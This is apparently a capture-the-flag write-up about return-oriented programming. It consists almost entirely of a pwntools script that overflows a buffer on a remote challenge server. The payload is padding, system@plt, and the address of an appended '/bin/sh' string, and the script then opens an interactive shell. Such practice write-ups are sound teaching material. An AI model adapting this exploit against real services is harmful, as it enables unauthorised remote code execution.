Shell time!

Previous problem

Return Oriented Programming (ROP)

from pwn import *

context.binary = './server'
elf = context.binary

p = remote('thekidofarcrania.com', 4902)
# p = process('./server')

s = p.recvuntil(b'Input some text: ')
addr = str(s.split(b'\n')[4].split(b' ')[0])[2:-1] # starting address of buffer

# 60 bytes of junk (as in prev problem) + system address + 0 (exit) + address of "/bin/sh" string + "/bin/sh" string
payload = b'A'*60 + p32(elf.plt.system) + p32(0) + p32(int(addr, 16)+72) + b'/bin/sh'

p.sendline(payload)
p.interactive()